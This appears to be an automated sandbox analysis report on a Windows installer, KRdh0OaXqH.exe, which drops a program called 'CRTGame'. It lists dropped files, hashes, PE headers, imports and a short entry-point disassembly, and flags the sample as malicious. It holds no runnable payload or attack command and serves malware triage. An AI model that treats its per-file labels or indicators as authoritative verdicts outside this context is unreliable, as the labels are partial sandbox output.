                                                                                          MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                          SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                          SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                          SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                          Malicious:false
                                                                                          Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1825
                                                                                          Entropy (8bit):5.088030483893024
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                          MD5:992C00BEAB194CE392117BB419F53051
                                                                                          SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                          SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                          SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                          Malicious:false
                                                                                          Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):714526
                                                                                          Entropy (8bit):6.5053900039496435
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                                          MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                                          SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                                          SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                                          SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                                          Malicious:false
                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:InnoSetup Log CRTGame, version 0x30, 8021 bytes, 226533\user, "C:\Program Files (x86)\CRTGame"
                                                                                          Category:dropped
                                                                                          Size (bytes):8021
                                                                                          Entropy (8bit):5.055151263516062
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:D3N8WVPpbbK+T4hlOIhlXWx4cVSQs0Ln9+7E2VYW4uT:D98WVPp1+QIhs+cVSQ1nIFmA
                                                                                          MD5:4E3566AEA6C511E6B0E1E1B41FACDC42
                                                                                          SHA1:83135A0B77D318EA0AD4512D86B457CDB8FFB80C
                                                                                          SHA-256:2610C20F92393138C606FC5D0CDAA4D3789131F0BF8AE4F22553810D8562C5EB
                                                                                          SHA-512:15B2136FD1EA5A756720A7AE9366D9EC24C2D45CA3CA31E8A7E7BEA7F09EB4474C7CB8F76567270D45905D43303A2099266F247D0D4ED82803F057000C461D04
                                                                                          Malicious:false
                                                                                          Preview:Inno Setup Uninstall Log (b)....................................CRTGame.........................................................................................................................CRTGame.........................................................................................................................0...G...U...%................................................................................................................Q.>.........{8.......?....226533.user.C:\Program Files (x86)\CRTGame.................. ..........h.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...............................o...........!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.GetSystemMet
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):714526
                                                                                          Entropy (8bit):6.5053900039496435
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                                          MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                                          SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                                          SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                                          SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                                          Malicious:false
                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2199540
                                                                                          Entropy (8bit):6.34382356471681
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:vWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:+t0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                                          MD5:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                                          SHA1:5017DC7277DBC5BB0B6F8428E4FF72603E3A370B
                                                                                          SHA-256:59495C6E79C301F767F3D336050FB9927826F0AE972D634D395F5B44D7280A09
                                                                                          SHA-512:4BE3E838FB41CD4D01A12B639CDCB93DF94DEEC0DEBD2593C53BBFE977DAF5BCB9E3F97F6C47D33E76AEA12AE2F9224F27652DFB5B5A69F53D201184766FFF91
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):4
                                                                                          Entropy (8bit):0.8112781244591328
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:1ln:v
                                                                                          MD5:34F45818F16D1BBB62BA5874B8814CC7
                                                                                          SHA1:A454CA483B4A66B83826D061BE2859DD79FF0D6C
                                                                                          SHA-256:DC765660B06EE03DD16FD7CA5B957E8C805161AC2C4AF28C5A100AB2AB432CA1
                                                                                          SHA-512:65711C8D556639DDFC14CE292B2415F3A2824D003AF1A530093B8E0B70B695E6C639694B7B90C6750B1129566D9A3784ED274667988D4B227DB2AC9B6CF7548B
                                                                                          Malicious:false
                                                                                          Preview:....
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):128
                                                                                          Entropy (8bit):2.862976125752538
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:1k/QnTzXD9iIgAnDTa3pkHil/:11TzXD9iIxPa3pkHit
                                                                                          MD5:785BB7F0B0CEF59C39B9F5E21CD2FD04
                                                                                          SHA1:1E1FFDEE1584A00BDE18BD7BD19C02988301C250
                                                                                          SHA-256:90B35EC0C6B41ACEC2C9BB51CDDCB6339FB035C222766A4CA4CBB15B7A7D8853
                                                                                          SHA-512:6D2449E111F7F059734960B83B0B090A7239EE2D93EB70F839ECDDAA640658B90667F123CFB4FE8E0F5DC0A854A47B62AA2FCAF971D08B9118CAC840DBF999EB
                                                                                          Malicious:false
                                                                                          Preview:3e0f25005939fee32fa196d33e7a2b8f6ce30e1128f6a30e537a9ba072d59a73................................................................
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          File Type:OpenPGP Secret Key
                                                                                          Category:dropped
                                                                                          Size (bytes):8
                                                                                          Entropy (8bit):2.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:0ll:0/
                                                                                          MD5:89FB9612A4F22B2D98B691F0B2F3B75C
                                                                                          SHA1:52E7CA16A90F332335E33C6408D5AE95C3EECD20
                                                                                          SHA-256:412A42092F1B5ECB0CF85688E0EC31EE119225DDF33241FE872A371402DF4CAF
                                                                                          SHA-512:C3000EF814064A83B93D4D8611160C46E59401E4442C1DE70CDA2CB307CE41C89F9C24AF193FC17780C919719BB4CAF4CC032DCC0EC86BCCAD51191DB1F9462F
                                                                                          Malicious:false
                                                                                          Preview:..]g....
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4096
                                                                                          Entropy (8bit):4.026670007889822
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                                          MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                                          SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                                          SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                                          SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2560
                                                                                          Entropy (8bit):2.8818118453929262
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):19456
                                                                                          Entropy (8bit):5.8975201046735535
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:ED4NeA1PrXPBdHCNPJEQkWybd0oBSRnAZ806OSDrgtOFXqYUPYNQLJ/k+9tPEBer:64NHPfHCs6GNOpiM+RFjFyzcN23A
                                                                                          MD5:3ADAA386B671C2DF3BAE5B39DC093008
                                                                                          SHA1:067CF95FBDB922D81DB58432C46930F86D23DDED
                                                                                          SHA-256:71CD2F5BC6E13B8349A7C98697C6D2E3FCDEEA92699CEDD591875BEA869FAE38
                                                                                          SHA-512:BBE4187758D1A69F75A8CCA6B3184E0C20CF8701B16531B55ED4987497934B3C9EF66ECD5E6B83C7357F69734F1C8301B9F82F0A024BB693B732A2D5760FD303
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P.......................................................................P.......P..(............................p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):6144
                                                                                          Entropy (8bit):4.215994423157539
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                          MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                          SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                          SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                          SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):23312
                                                                                          Entropy (8bit):4.596242908851566
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                          MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                          SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                          SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                          SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\Desktop\KRdh0OaXqH.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):704000
                                                                                          Entropy (8bit):6.4972640482038075
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:XRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExyc:BObekrkfohrP337uzHnA6cHiiHEVVg6X
                                                                                          MD5:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                                          SHA1:31808F1FFA84C954376975B7CDB0007E6B762488
                                                                                          SHA-256:7233B85EB0F8B3AA5CAE3811D727AA8742FEC4D1091C120A0FE15006F424CC49
                                                                                          SHA-512:F8197458CD2764C0B852DAC34F9BF361110A7DC86903024A97C7BCD3F77B148342BF45E3C2B60F6AF8198AE3B83938DBAAD5E007D71A0F88006F3A0618CF36F4
                                                                                          Malicious:true
                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.999404762558587
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                                          • Inno Setup installer (109748/4) 1.08%
                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          File name:KRdh0OaXqH.exe
                                                                                          File size:7'246'011 bytes
                                                                                          MD5:61ab9f06b48b8df40ce15ce9252c0531
                                                                                          SHA1:02d1610e771bea84c27aafd05df21dcb300420e5
                                                                                          SHA256:732bccaeb50d50526b5f6c8817ce889d04fb7b67a52b88f79e223d4cf9b807ae
                                                                                          SHA512:f6761a7849aca0edda28e1951fe998578588c3e93b58bc6444538e5b3cec3407742c24b923d8b7aa33ea3f9417a6eab0c9612964b0eb17196931d3127166b3f1
                                                                                          SSDEEP:196608:dK2+nNevvWstwr2m5BmycyEbSfasepd5e4x6+AjZ6mjxzj:dDY6tiP3myRfzepXe4ny8gxzj
                                                                                          TLSH:96763373295C173AE240CA3166AFE1A9E16A3F3DD53B0690E2C4B1BD1BDF8E1581C725
                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                          Icon Hash:2d2e3797b32b2b99
                                                                                          Entrypoint:0x409c40
                                                                                          Entrypoint Section:CODE
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x65765E3E [Mon Dec 11 00:56:30 2023 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:1
                                                                                          OS Version Minor:0
                                                                                          File Version Major:1
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:1
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                          Instruction
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          add esp, FFFFFFC4h
                                                                                          push ebx
                                                                                          push esi
                                                                                          push edi
                                                                                          xor eax, eax
                                                                                          mov dword ptr [ebp-10h], eax
                                                                                          mov dword ptr [ebp-24h], eax
                                                                                          call 00007F64310CEAEBh
                                                                                          call 00007F64310CFCF2h
                                                                                          call 00007F64310CFF81h
                                                                                          call 00007F64310D1FB8h
                                                                                          call 00007F64310D1FFFh
                                                                                          call 00007F64310D492Eh
                                                                                          call 00007F64310D4A95h
                                                                                          xor eax, eax
                                                                                          push ebp
                                                                                          push 0040A2FCh
                                                                                          push dword ptr fs:[eax]
                                                                                          mov dword ptr fs:[eax], esp
                                                                                          xor edx, edx
                                                                                          push ebp
                                                                                          push 0040A2C5h
                                                                                          push dword ptr fs:[edx]
                                                                                          mov dword ptr fs:[edx], esp
                                                                                          mov eax, dword ptr [0040C014h]
                                                                                          call 00007F64310D54FBh
                                                                                          call 00007F64310D512Eh
                                                                                          lea edx, dword ptr [ebp-10h]
                                                                                          xor eax, eax
                                                                                          call 00007F64310D25E8h
                                                                                          mov edx, dword ptr [ebp-10h]
                                                                                          mov eax, 0040CDE8h
                                                                                          call 00007F64310CEB97h
                                                                                          push 00000002h
                                                                                          push 00000000h
                                                                                          push 00000001h
                                                                                          mov ecx, dword ptr [0040CDE8h]
                                                                                          mov dl, 01h
                                                                                          mov eax, 0040738Ch
                                                                                          call 00007F64310D2E77h
                                                                                          mov dword ptr [0040CDECh], eax
                                                                                          xor edx, edx
                                                                                          push ebp
                                                                                          push 0040A27Dh
                                                                                          push dword ptr fs:[edx]
                                                                                          mov dword ptr fs:[edx], esp
                                                                                          call 00007F64310D556Bh
                                                                                          mov dword ptr [0040CDF4h], eax
                                                                                          mov eax, dword ptr [0040CDF4h]
                                                                                          cmp dword ptr [eax+0Ch], 01h
                                                                                          jne 00007F64310D56AAh
                                                                                          mov eax, dword ptr [0040CDF4h]
                                                                                          mov edx, 00000028h
                                                                                          call 00007F64310D3278h
                                                                                          mov edx, dword ptr [000000F4h]
                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          CODE0x10000x93640x94000d7ac17dafcd52a9b3ea353c32256c1dFalse0.6148648648648649data6.56223225792919IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          DATA0xb0000x24c0x40045829356498700390b8c7afa10ea05a4False0.31640625data2.7585022150416294IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          BSS0xc0000xe4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x110000x2c000x2c0012ab88ff2529942b16e663a514fbedeeFalse0.32262073863636365data4.461731535554609IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                          RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                          RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                          RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                          RT_STRING0x125740x2f2data0.35543766578249336
                                                                                          RT_STRING0x128680x30cdata0.3871794871794872
                                                                                          RT_STRING0x12b740x2cedata0.42618384401114207
                                                                                          RT_STRING0x12e440x68data0.75
                                                                                          RT_STRING0x12eac0xb4data0.6277777777777778
                                                                                          RT_STRING0x12f600xaedata0.5344827586206896
                                                                                          RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                                          RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                                          RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.27483443708609273
                                                                                          RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093
                                                                                          DLLImport
                                                                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                          user32.dllMessageBoxA
                                                                                          oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
